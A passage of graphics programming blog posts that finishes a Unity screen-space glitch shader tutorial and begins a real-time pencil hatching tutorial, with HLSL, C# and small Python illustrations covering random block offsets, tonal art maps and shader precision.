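/* Assumption: model a "fixed" as a value rounded to the nearest 1/256. */
float quantize_fixed(float v)
{
    return floorf(v * 256.0f + 0.5f) / 256.0f;
}

/* Which texel column a U coordinate lands on in a texture `width` texels wide. */
int texel_column(float u, int width)
{
    return (int)floorf(u * (float)width);
}</code></pre></figure>
<p>On a 1024 texel wide texture, the centers of texel 0 (0.5/1024) and texel 1 (1.5/1024) both snap to 0.0 once they’ve been squeezed into this model of a fixed, so neighbouring texels become indistinguishable.</p>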
<p>It’s worth noting that although we’re working with fixeds a lot in this post, on newer hardware, most GPUs have full support for halfs and will go so far as to ignore the fixed qualifier and do everything in halfs and floats. Check the specifics for your target devices, but it’s usually safe to say that if your iOS device supports Metal, it’s safe to use halfs instead of fixeds. I’m under the impression that this is even more common on desktops.</p>
<p>Alright, back to making things look cool!</p>
<h2 id="randomizing-the-glitch">Randomizing the Glitch</h2>
<p>Our effect is looking better, but it still isn’t really “glitchy” is it? If we leave our glitch value alone, the effect stays static, distorting fixed blocks on the screen. As well, even with the _GlitchAmount value changing, our effect follows a predictable pattern, always glitching blocks in the same order. It’s time to make this a bit more random.</p>
<p>To do this, we’re going to need to be able to get a random value for each block to use instead of the red channel intensity to decide when to glitch a block. Further, we’re going to want this random value to not only be uniform across an entire block, we also want to be able to control when the random values change so that we can control how fast our effect updates.</p>
<p>Luckily, the commonly copy/pasted one liner for generating random numbers in a shader takes two parameters as input:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="kt">float</span> <span class="nf">rand</span><span class="p">(</span><span class="n">float2</span> <span class="n">co</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="nf">frac</span><span class="p">(</span><span class="nf">sin</span><span class="p">(</span><span class="nf">dot</span><span class="p">(</span><span class="n">co</span><span class="p">.</span><span class="n">xy</span><span class="p">,</span> <span class="nf">float2</span><span class="p">(</span><span class="m">12.9898</span><span class="p">,</span> <span class="m">78.233</span><span class="p">)))</span> <span class="p">*</span> <span class="m">43758.5453</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>So we’re going to use that, and pass the red channel value as the first component of co, and pass a uniform float that we send from C# to the shader as the second component. It’s beyond the scope of this post to talk about how this one liner works, but if you have a spare second it’s definitely worth googling.</p>
<p>This time we’re using floats because we want more potential variety in our random number. Using a half or a fixed reduces the number of values that can be represented between 0 and 1. It might not make a huge difference if you use halfs here instead of floats, but it will make some, and as you’ll see in a second, we would need to cast it up to a float back in our fragment function anyway.</p>
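<p>If you want to poke at the one liner outside of a shader, here’s a rough CPU-side sketch of it in Python. The block_red and seed values are made up for illustration, and Python doubles won’t match GPU float results digit for digit, so treat this as a way to see the behaviour rather than an exact port.</p>

```python
import math

def frac(x):
    # Fractional part, matching the shader's frac() for any sign of x.
    return x - math.floor(x)

def rand(co):
    # CPU-side copy of the shader one liner; co is an (x, y) pair.
    d = co[0] * 12.9898 + co[1] * 78.233
    return frac(math.sin(d) * 43758.5453)

block_red = 0.4               # hypothetical red channel value shared by one block
seed_a, seed_b = 0.1, -0.7    # hypothetical _GlitchRandom values

# Every pixel in a block passes the same inputs, so it gets the same result.
same_block = rand((block_red, seed_a)) == rand((block_red, seed_a))
# Changing the second component re-rolls the value for that block.
changed = rand((block_red, seed_a)) != rand((block_red, seed_b))
print(same_block, changed)
```

<p>The important property for us is that the function is deterministic: the result only changes when one of the two inputs changes, which is what lets us decide when the glitch pattern updates.</p>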
<p>Our shader now looks like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_GlitchMap</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_GlitchAmount</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_GlitchRandom</span><span class="p">;</span>
<span class="kt">float</span> <span class="nf">rand</span><span class="p">(</span><span class="n">float2</span> <span class="n">co</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="nf">frac</span><span class="p">(</span><span class="nf">sin</span><span class="p">(</span><span class="nf">dot</span><span class="p">(</span><span class="n">co</span><span class="p">.</span><span class="n">xy</span><span class="p">,</span> <span class="nf">float2</span><span class="p">(</span><span class="m">12.9898</span><span class="p">,</span> <span class="m">78.233</span><span class="p">)))</span> <span class="p">*</span> <span class="m">43758.5453</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed2</span> <span class="n">glitch</span> <span class="p">=</span> <span class="p">(</span><span class="nf">tex2D</span><span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">)).</span><span class="n">rg</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">r</span> <span class="p">=</span> <span class="p">(</span><span class="nf">rand</span><span class="p">(</span><span class="nf">float2</span><span class="p">(</span><span class="n">glitch</span><span class="p">.</span><span class="n">r</span><span class="p">,</span> <span class="n">_GlitchRandom</span><span class="p">)));</span>
<span class="kt">float</span> <span class="n">gFlag</span> <span class="p">=</span> <span class="nf">max</span><span class="p">(</span><span class="m">0.0</span><span class="p">,</span> <span class="nf">ceil</span><span class="p">(</span><span class="n">_GlitchAmount</span> <span class="p">-</span> <span class="n">r</span><span class="p">));</span>
<span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span> <span class="p">*</span> <span class="n">gFlag</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">frac</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">uvShift</span><span class="p">));</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
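<p>The gFlag line is doing the job of an if statement without branching. Here’s a small Python sketch of that one expression, using made up per-block random values, to show that it only ever produces 0 or 1 and that roughly _GlitchAmount of the blocks end up glitching.</p>

```python
import math

def glitch_flag(glitch_amount, r):
    # Same expression as the shader: 1.0 when r is below glitch_amount, else 0.0.
    return max(0.0, float(math.ceil(glitch_amount - r)))

# Hypothetical per-block random values, evenly spread for illustration.
block_randoms = [i / 10.0 for i in range(10)]   # 0.0, 0.1, ... 0.9
flags = [glitch_flag(0.25, r) for r in block_randoms]
print(flags)
print(sum(flags) / len(flags))   # fraction of blocks that glitch
```

<p>This relies on _GlitchAmount staying in the 0-1 range and the random value staying below 1, otherwise ceil could return something bigger than 1.</p>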
<p>And in C#, we have to add a line to our Update() function:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">Update</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">glitchAmount</span> <span class="p">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="nf">Clamp</span><span class="p">(</span><span class="n">glitchAmount</span><span class="p">,</span> <span class="m">0.0f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">);</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetFloat</span><span class="p">(</span><span class="s">"_GlitchRandom"</span><span class="p">,</span> <span class="n">Random</span><span class="p">.</span><span class="nf">Range</span><span class="p">(-</span><span class="m">1.0f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">));</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetFloat</span><span class="p">(</span><span class="s">"_GlitchAmount"</span><span class="p">,</span> <span class="n">glitchAmount</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>If you set your _GlitchAmount to 0.2 and run this now it looks something like this:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/fast.gif" /><br />
</div>
<p>Which is much better, but a little bit too frantic for my liking. I ended up putting my _GlitchRandom setter inside another function that I called using Invoke, so that I could control how often I wanted my effect to update:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">Start</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">_glitchShader</span> <span class="p">=</span> <span class="n">Shader</span><span class="p">.</span><span class="nf">Find</span><span class="p">(</span><span class="s">"Hidden/GlitchFX/GlitchFX_Shift"</span><span class="p">);</span>
<span class="n">_glitchMat</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Material</span><span class="p">(</span><span class="n">_glitchShader</span><span class="p">);</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetTexture</span><span class="p">(</span><span class="s">"_GlitchMap"</span><span class="p">,</span> <span class="n">blockTexture</span><span class="p">);</span>
<span class="nf">Invoke</span><span class="p">(</span><span class="s">"UpdateRandom"</span><span class="p">,</span> <span class="m">0.25f</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">void</span> <span class="nf">UpdateRandom</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetFloat</span><span class="p">(</span><span class="s">"_GlitchRandom"</span><span class="p">,</span> <span class="n">Random</span><span class="p">.</span><span class="nf">Range</span><span class="p">(-</span><span class="m">1.0f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">));</span>
<span class="nf">Invoke</span><span class="p">(</span><span class="s">"UpdateRandom"</span><span class="p">,</span> <span class="n">Random</span><span class="p">.</span><span class="nf">Range</span><span class="p">(</span><span class="m">0.01f</span><span class="p">,</span> <span class="m">0.15f</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
<p>It’s a little change, but it makes a big difference!</p>
<div align="center">
<img src="/images/post_images/2017-03-13/slow2.gif" /><br />
</div>
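<p>To get a feel for how much slower this makes the updates, here’s a rough Python simulation of the same scheduling pattern. The reroll_times function and its seed parameter are my own stand-ins for illustration, not anything from Unity.</p>

```python
import random

def reroll_times(duration, first_delay=0.25, lo=0.01, hi=0.15, seed=1):
    # Mimics Start() + UpdateRandom(): the first call happens after first_delay
    # seconds, then each call schedules the next one lo..hi seconds later.
    rng = random.Random(seed)   # seeded only so the sketch is repeatable
    times = []
    t = first_delay
    while duration >= t:
        times.append(t)
        t += rng.uniform(lo, hi)
    return times

times = reroll_times(duration=5.0)
print(len(times) / 5.0)   # average re-rolls per second
```

<p>Since the delay averages out to about 0.08 seconds, you should see somewhere in the neighbourhood of a dozen re-rolls per second, instead of one on every rendered frame.</p>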
<h2 id="adding-new-sample-directions">Adding New Sample Directions</h2>
<p>We have two final problems to solve:</p>
<ul>
<li>when the effect is set to 1.0, the screen still ends up with a static looking glitch effect</li>
<li>all our texture lookups are going in the same direction, since we’re using a gray value as our offset</li>
</ul>
<p>Thankfully both are pretty easy to solve. To fix the first one, all I’m going to do is multiply the UV offset by the random value for the block. This way, even when the entire screen is glitching, when _GlitchRandom updates, every block will use different UV coordinates, making it much less uniform.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span> <span class="p">*</span> <span class="n">gFlag</span> <span class="p">*</span> <span class="n">r</span><span class="p">;</span></code></pre></figure>
<p>And secondly, we’re finally going to use that coloured noise map I showed you at the very beginning! Until now, we’ve been using the rg components of the noise texture as a cheap way to get a uv offset. Now we’re going to change to using the coloured map, and use the green and blue components for this vector:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed3</span> <span class="n">glitch</span> <span class="p">=</span> <span class="p">(</span><span class="nf">tex2D</span><span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">)).</span><span class="n">rgb</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">r</span> <span class="p">=</span> <span class="p">(</span><span class="nf">rand</span><span class="p">(</span><span class="nf">float2</span><span class="p">(</span><span class="n">glitch</span><span class="p">.</span><span class="n">r</span><span class="p">,</span> <span class="n">_GlitchRandom</span><span class="p">)));</span>
<span class="kt">float</span> <span class="n">gFlag</span> <span class="p">=</span> <span class="nf">max</span><span class="p">(</span><span class="m">0.0</span><span class="p">,</span> <span class="nf">ceil</span><span class="p">(</span><span class="n">_GlitchAmount</span><span class="p">-</span><span class="n">r</span><span class="p">));</span>
<span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">gb</span> <span class="p">*</span> <span class="n">gFlag</span> <span class="p">*</span> <span class="n">r</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">frac</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">uvShift</span><span class="p">));</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>This is better, but since the .gb channels will always have positive values, our texture lookups still only shift in the positive direction along both axes. To fix this, we need to stretch the range of these channels so that 0.5 becomes our new 0, and values lower than 0.5 become negative. This just takes a quick multiply and subtract:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="p">(</span><span class="n">glitch</span><span class="p">.</span><span class="n">gb</span> <span class="p">*</span> <span class="m">2.0</span> <span class="p">-</span> <span class="m">1.0</span><span class="p">)</span> <span class="p">*</span> <span class="n">gFlag</span> <span class="p">*</span> <span class="n">r</span><span class="p">;</span></code></pre></figure>
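<p>If the remap isn’t obvious, here’s a quick Python sketch of just that part of the line, with a few made up channel values. The function names are mine, chosen for illustration.</p>

```python
def remap_signed(channel):
    # Stretch a 0..1 texture channel to -1..1, so 0.5 becomes "no shift".
    return channel * 2.0 - 1.0

def uv_shift(green, blue, g_flag):
    # The remap and the glitch mask from the shader line, per component.
    return (remap_signed(green) * g_flag, remap_signed(blue) * g_flag)

print(uv_shift(0.0, 1.0, 1.0))    # (-1.0, 1.0)
print(uv_shift(0.5, 0.25, 1.0))   # (0.0, -0.5)
print(uv_shift(0.9, 0.1, 0.0))    # no shift when the block isn't glitching
```

<p>Channel values under 0.5 now push the lookup in the negative direction, so blocks can sample from any side of their original position.</p>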
<p>If you run this now, you’re going to get exactly the effect that was shown at the start of the article!</p>
<h2 id="wrap-up">Wrap Up</h2>
<p>As usual, all of the code I talked about here is available <a href="https://github.com/khalladay/GlitchFX">on github</a>, feel free to grab that and use it however you want!</p>
<p>Let’s end by talking about performance, and some ways you could extend this effect.</p>
<p>From a performance standpoint, this is a remarkably light effect. Even though we’re introducing a dependent texture read on a full resolution screen buffer, my iPhone 6 barely noticed this thing running, taking around 0.2 ms to render it. One thing to keep in mind with this effect is that the cost is the same whether you’re glitching the whole screen, or not glitching anything, so if you have this in a project, it might be worth adding some logic on the c# side to disable the effect when _GlitchAmount is set to 0.</p>
<p>Finally, there are LOTS of ways you can extend this effect! You could hue shift the glitched blocks, tint them colours, you could add chromatic aberration to the glitched blocks, or use a noise texture to add weird artifacts over them. The sky is really the limit here. If you want some inspiration, take a look at the page for the <a href="http://www.digieffects.com/products/damage">DigiEffects Damage AfterEffects Package</a>. Glitch effects are really fun because there’s so much you can do with them since you’re not trying to make things look “correct,” which is probably why so many people like making glitch art.</p>
<p>That’s it for now! As usual, if you have questions, or want to say hi, or see something I got wrong, please send me a message <a href="https://twitter.com/khalladay">on Twitter</a>! Have a good one!</p>
A Pencil Sketch Effect
2017-02-21T00:00:00+00:00
http://kylehalladay.com/blog/tutorial/2017/02/21/Pencil-Sketch-Effect
<p>There are a handful of effects that have kicked around in my brain for a while in a nebulous “one day, I want to build that” sort of way. Some of these include using genetic algorithms to turn images into triangles (like <a href="https://rogerjohansson.blog/2008/12/11/genetic-gallery/">here</a>), Portals, Procedural Clouds, and the one I decided to build this weekend: Real Time Hatching (or something like it)!</p>
<div align="center">
<img src="/images/post_images/2017-02-19/smallerest.gif" /><br />
</div>
<p>Real Time Hatching is the fancy (and much more concise) way of describing the class of rendering effects that make scenes look like they were drawn (or at least shaded) by hand. The effect is actually reasonably simple, but it’s pretty fun and provides a few good excuses to talk about fixed/half/float precision.</p>
<p>I’m going to present the basic effect as a shader that you can attach to a single object, show how to turn that into a post effect that will work on the whole screen, and take a few detours in the process. All the code here is going to be for Unity 5.5, so your mileage may vary if you’re using a different version.</p>
<h2 id="tonal-art-maps">Tonal Art Maps</h2>
<p>Before we do anything though, we need to talk about the basic theory behind real time hatching. The whole effect is based on the concept of Tonal Art Maps (or TAMs). These are a series of textures which correspond to how you want your art to look at different lighting intensities. The tricky part about them is that in order for things to look right, each texture needs to contain all the information stored in every map that corresponds to a brighter tone. So your second brightest map needs to contain all the texture data of your brightest, plus the additional data that makes this map darker.</p>
<p>This is sorta complicated when stated in words, but it’s a lot more intuitive when you see the textures. The following was taken from a widely cited research paper (located <a href="http://hhoppe.com/hatching.pdf">here</a>), which presented the technique we’re going to use today.</p>
<div align="center">
<img src="/images/post_images/2017-02-19/tamimages.PNG" /><br />
</div>
<p>As you can see, each map represents pencil strokes that an artist would make to shade in a part of a piece of paper. The darker maps contain all the pencil strokes from the brighter regions, and then add more. If you don’t follow this rule when creating your maps, the strokes won’t nicely flow into each other, and you’ll end up with very weird looking line shading.</p>
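<p>If it helps, you can think of each map as a set of strokes. Here’s a tiny Python sketch of the nesting rule using made up stroke IDs (a real TAM stores strokes as pixels in textures, so this is only a model of the idea):</p>

```python
# Hypothetical stroke IDs; a real TAM stores these as pixels in textures.
strokes_added_per_tone = [
    {"s1", "s2"},        # brightest map
    {"s3"},              # extra strokes for the next darker tone
    {"s4", "s5"},        # extra strokes for the darkest tone in this example
]

def build_tam(strokes_added):
    # Each tone keeps every stroke from the brighter tones, then adds its own.
    tones, current = [], set()
    for extra in strokes_added:
        current = current | extra
        tones.append(set(current))
    return tones

def is_nested(tones):
    # True when every brighter map is a subset of the next darker one.
    return all(a.issubset(b) for a, b in zip(tones, tones[1:]))

tam = build_tam(strokes_added_per_tone)
print([len(t) for t in tam])   # [2, 3, 5]
print(is_nested(tam))          # True
```

<p>Building the maps cumulatively like this is what guarantees that a stroke never disappears as a surface gets darker.</p>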
<p>In order for us to have a “proper” TAM, we need to go a step further than simply authoring our hatching textures according to the above rules: we also need to provide custom mips. If you don’t, then as your objects get farther away, you’re going to see less and less stroke detail on them. The paper goes into detail as to how they generated the custom mips, and provides an example of what they made:</p>
<div align="center">
<img src="/images/post_images/2017-02-19/tammips.PNG" />
<font size="2"><i>from http://hhoppe.com/hatching.pdf</i></font><br /><br />
</div>
<p>I’m actually going to skip all of this custom mip texture generation stuff, because I don’t feel like creating my own TAM generator, given that my interest in this effect was really just in figuring out how it worked, not using it for a commercial product. Suffice it to say, I’m sure it would look better if you spent the time to create the custom mips. If you want to get a look at a working TAM generator, I found one written in Processing <a href="https://sites.google.com/site/cs7490finalrealtimehatching/">here</a>.</p>
<p>Ok, that was a lot of writing for not a lot of output, but now that we have our TAM images, we can proceed with actually creating the effect.</p>
<h2 id="a-single-object-shader">A Single Object Shader</h2>
<p>So now that we have our TAMs, we need to create a shader that uses them. The paper that I cited earlier presents a method for applying a set of 6 TAM tones to an object and, importantly, packs them so that those 6 lookups only cost two texture accesses. This is an important thing to dwell on for a second, because it gets missed a lot of the time when people post real time hatching shaders: DO NOT add 6 texture lookups to your shader for hatching. Pack the textures into the channels of 2 RGB textures instead.</p>
<p>To pack the TAM textures together, I wrote a quick and dirty Unity tool. The code is a bit long to paste here, but it’s available on the github repo linked at the end of the post, or in the gist <a href="https://gist.github.com/khalladay/e017625b018531e579905369f1011c08">here</a>.</p>
<p>I used that tool to combine the above 6 TAM images into the following:</p>
<div align="center">
<img src="/images/post_images/2017-02-19/packedhatch.png" /><br />
</div>
<p>Which is much more space efficient! Now we need to look at how the shader is going to work.</p>
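<p>The packing itself is nothing fancy. This isn’t the Unity tool from the gist, just a minimal Python sketch of the idea, and it assumes the tones are ordered brightest first and that images are flat lists of 0-1 grayscale values:</p>

```python
def pack_tams(tones):
    # tones: six grayscale images, brightest first, each a flat list of 0..1 values.
    # Returns two RGB images as lists of (r, g, b) tuples.
    if len(tones) != 6:
        raise ValueError("expected exactly 6 tone maps")
    hatch0 = list(zip(tones[0], tones[1], tones[2]))
    hatch1 = list(zip(tones[3], tones[4], tones[5]))
    return hatch0, hatch1

# Six tiny 2-pixel "images" standing in for the real TAM textures.
tones = [[1.0, 0.9], [0.9, 0.8], [0.8, 0.6], [0.6, 0.5], [0.4, 0.3], [0.2, 0.0]]
hatch0, hatch1 = pack_tams(tones)
print(hatch0[0])   # (1.0, 0.9, 0.8)
print(hatch1[1])   # (0.5, 0.3, 0.0)
```

<p>Each tone just becomes one colour channel, so a single tex2D call on a packed texture hands the shader three tones at once.</p>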
<p>Obviously we’re going to be blending between the 6 channels in our two textures, but how we do it is pretty nifty. Before we get started though, let’s get the basic skeleton of our shader out of the way. Remember that for now, we’re going to be writing a shader that we can apply to a single object. Here’s the setup:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_MainTex_ST</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_Hatch0</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_Hatch1</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_LightColor0</span><span class="p">;</span>
<span class="n">v2f</span> <span class="nf">vert</span> <span class="p">(</span><span class="n">appdata</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">v2f</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">vertex</span> <span class="p">=</span> <span class="nf">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="p">=</span> <span class="n">v</span><span class="p">.</span><span class="n">uv</span> <span class="p">*</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">xy</span> <span class="p">+</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">zw</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">nrm</span> <span class="p">=</span> <span class="nf">mul</span><span class="p">(</span><span class="nf">float4</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">norm</span><span class="p">,</span> <span class="m">0.0</span><span class="p">),</span> <span class="n">unity_WorldToObject</span><span class="p">).</span><span class="n">xyz</span><span class="p">;</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">fixed4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">color</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">half3</span> <span class="n">diffuse</span> <span class="p">=</span> <span class="n">color</span><span class="p">.</span><span class="n">rgb</span> <span class="p">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="p">*</span> <span class="nf">dot</span><span class="p">(</span><span class="n">_WorldSpaceLightPos0</span><span class="p">,</span> <span class="nf">normalize</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">nrm</span><span class="p">));</span>
<span class="c1">//hatching logic goes here</span>
<span class="k">return</span> <span class="n">color</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The complete source for the effect is available on github <a href="https://github.com/khalladay/PencilSketchEffect">here</a>, but hopefully the above is enough to get us all on the same page. All we have here is a standard diffuse shader. While you will likely need more than a single directional light in a real project, the hatching logic works well with any light input, so I’m going with a simple case here.</p>
<p>The first thing we need to do is to get a scalar representation of how bright our fragment is with all the lighting applied. This just requires a dot product against a vector constant (0.2126, 0.7152, 0.0722).</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half</span> <span class="n">intensity</span> <span class="p">=</span> <span class="nf">dot</span><span class="p">(</span><span class="n">diffuse</span><span class="p">,</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0.2126</span><span class="p">,</span> <span class="m">0.7152</span><span class="p">,</span> <span class="m">0.0722</span><span class="p">));</span></code></pre></figure>
<p>This constant comes from the <a href="https://en.wikipedia.org/wiki/Luminosity_function">luminosity function</a>, and in theory requires that the colour we’re multiplying it against has been converted to linear space. Depending on what platform you’re on, you may or may not care about this. For simplicity I’m going to omit it, just be aware that like most lighting calculations, if you aren’t working with linear colour, you’re sacrificing correctness in favor of performance.</p>
<p>Also note that we’re calculating this value in halfs. While you likely wouldn’t see too much of a difference with a fixed precision variable, an 11 bit fixed precision variable is only accurate to about 0.0039 (or 1/256), and the luminosity constant we’re using requires more precision to accurately represent. If you’re splitting hairs, you can’t store 0.7152 completely correctly in a half either, but it’s off by much, much less (if you’re interested, more info on half precision vars can be found <a href="http://www.codersnotes.com/notes/wrangling-halfs/">here</a>).</p>
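<p>You can check the precision claim on the CPU. The Python sketch below uses the standard Rec. 709 luminance weights (0.2126, 0.7152, 0.0722), round-trips each one through IEEE half precision with the struct module, and compares that against a simple model of a fixed that snaps to the nearest 1/256. The fixed model is my simplification, since real hardware may round differently.</p>

```python
import struct

REC709 = (0.2126, 0.7152, 0.0722)   # standard luminance weights

def luminance(rgb, weights=REC709):
    # Dot product of a linear RGB colour with the luminance weights.
    return sum(c * w for c, w in zip(rgb, weights))

def to_half(x):
    # Round-trip through IEEE 754 half precision (struct format "e").
    return struct.unpack("e", struct.pack("e", x))[0]

def to_fixed(x, steps=256):
    # Model a fixed with 1/256 resolution by snapping to the nearest step.
    return round(x * steps) / steps

for w in REC709:
    # weight, error when stored as a half, error when stored as a fixed
    print(w, abs(to_half(w) - w), abs(to_fixed(w) - w))
print(luminance((1.0, 1.0, 1.0)))
```

<p>For all three weights the half error comes out smaller than the fixed error, which is the reason for doing this bit of math in halfs.</p>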
<p>If we add that line to our shader, and output the result, we’ll end up with a nice grayscale effect:</p>
<div align="center">
<img src="/images/post_images/2017-02-19/grayscale.PNG" style="width:300px; height:300px" /><br />
</div>
<p>Now all we need to do is to convert that scalar intensity value into a hatch texture sample. We have 6 hatch channels, which means that there are going to be 6 different intensity values that will map to a sample from only 1 hatch texture (1/6, 2/6, 3/6, 4/6, 5/6, 6/6). Any value that isn’t one of these exact values is going to require us to blend between the two textures that our value is between. This means that an intensity value of 1.5 / 6 (or 0.25) will require us to blend between the textures that correspond to 1/6 and 2/6. This is demonstrated in the diagram below.</p>
<div align="center">
<img src="/images/post_images/2017-02-19/hatchblend.png" /><br />
</div>
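<p>Before worrying about how to do this on a GPU, here’s the same idea as a small Python sketch. The blend_pair function is a made up helper that returns which two levels an intensity sits between and how far along it is. It treats level 0 as just another stop, which is my assumption for the sketch.</p>

```python
import math

def blend_pair(intensity, levels=6):
    # Returns (lower_level, upper_level, t): the two tone levels to blend and
    # how far the intensity sits between them. Level k means k / levels.
    scaled = min(max(intensity, 0.0), 1.0) * levels
    lower = min(math.floor(scaled), levels - 1)
    t = scaled - lower
    return lower, lower + 1, t

print(blend_pair(0.25))   # (1, 2, 0.5): halfway between 1/6 and 2/6
print(blend_pair(0.5))    # (3, 4, 0.0): exactly on the 3/6 level
```

<p>The upper texture gets a weight of t and the lower one gets 1 - t, so the two weights always add up to 1.</p>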
<p>Unfortunately for us, GPUs (or at least, mobile GPUs) aren’t great at branching logic. So while it seems straightforward to write this with a few if statements like so:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed3</span> <span class="n">rgb</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">intensity</span> <span class="p">></span> <span class="m">1.0</span> <span class="p">&&</span> <span class="n">intensity</span> <span class="p"><</span> <span class="m">2.0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fixed3</span> <span class="n">hatch</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">hatch0</span><span class="p">,</span> <span class="n">uv</span><span class="p">);</span>
<span class="n">rgb</span> <span class="p">+=</span> <span class="n">hatch</span><span class="p">.</span><span class="n">r</span> <span class="p">*</span> <span class="p">(</span><span class="m">2.0</span> <span class="p">-</span> <span class="n">intensity</span><span class="p">);</span>
<span class="n">rgb</span> <span class="p">+=</span> <span class="n">hatch</span><span class="p">.</span><span class="n">g</span> <span class="p">*</span> <span class="p">(</span><span class="n">intensity</span> <span class="p">-</span> <span class="m">1.0</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">intensity</span> <span class="p">==</span> <span class="m">2.0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">rgb</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">hatch0</span><span class="p">,</span> <span class="n">uv</span><span class="p">).</span><span class="n">g</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">...</span></code></pre></figure>
